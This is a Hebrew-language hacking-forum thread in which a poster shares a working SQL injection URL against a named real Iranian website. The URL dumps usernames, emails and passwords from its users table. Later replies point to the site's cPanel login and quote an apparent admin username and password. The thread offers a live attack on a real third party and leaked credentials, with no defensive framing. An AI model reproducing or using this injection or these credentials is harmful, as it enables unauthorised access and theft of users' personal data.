קוד:http://www.techsun.ir/content.php?id=-180%20OR%201=1%20AND%201=1%20UNION%20SELECT%201,2,3,4,5,concat%28username,0x3a,email,0x3a,password,0x3a%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20FROM%20users
SQLI באתר איראני
קוד:http://www.techsun.ir/content.php?id=-180%20OR%201=1%20AND%201=1%20UNION%20SELECT%201,2,3,4,5,concat%28username,0x3a,email,0x3a,password,0x3a%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20FROM%20users
|
|
אתה יודע אולי את הפאנל ניהול שלו ?נכתב במקור על ידי Expl0it3d
כבר חפרת על האתר הזה ,
גם סרטון וגם פרסמת פעם משתמשים .
בכל אופן ,
תודה .
\ ´¯\).........(/¯`/
\....\\............//..../
\....\\Ne0//..../
\´¯\....\´¯/...........\¯`/..../¯`/
\.\...\....\....\.|_......_|./..../..../..././
(.(....(....(....\.)..)..(..(./...)....)....).)
/.............../\...\..../.../\...............\
/.................\......../.................\
זוהר מה הפאנל ניהול ?
http://www.techsun.ir:2082/
אבל זה לcpanel אז לא יעבוד לך עם הפרטים של admin ו2k338733
נערך לאחרונה על ידי OverPowered; 06-03-2011 בשעה 17:59.
אז איפה זה יעבוד ?
תודה
מציאה נחמדה
זה לא אותו אתר
הכוונה היא לשדר לך את המטרה -
לנסות להראות לך שאבטחת מידע זה לא רק מתקפת sqli ..
\ ´¯\).........(/¯`/
\....\\............//..../
\....\\Ne0//..../
\´¯\....\´¯/...........\¯`/..../¯`/
\.\...\....\....\.|_......_|./..../..../..././
(.(....(....(....\.)..)..(..(./...)....)....).)
/.............../\...\..../.../\...............\
/.................\......../.................\
לא אמרתי שאבטחת מידע זה רק SQLi
ne0 לא התכוון שאתה אמרת זאת - פשוט מה שאתה מציג לנו , זה רק התקפת Sql injection (אגב גם הכינוי שלי).
נערך לאחרונה על ידי Num32; 06-03-2011 בשעה 21:45.
מנהל אבטחת מידע לשעבר.
מיזה זוהר? קוראים לו בכלל דומיניק
...
\ ´¯\).........(/¯`/
\....\\............//..../
\....\\Ne0//..../
\´¯\....\´¯/...........\¯`/..../¯`/
\.\...\....\....\.|_......_|./..../..../..././
(.(....(....(....\.)..)..(..(./...)....)....).)
/.............../\...\..../.../\...............\
/.................\......../.................\
הרשאות פרסום
ציטוט ההודעה
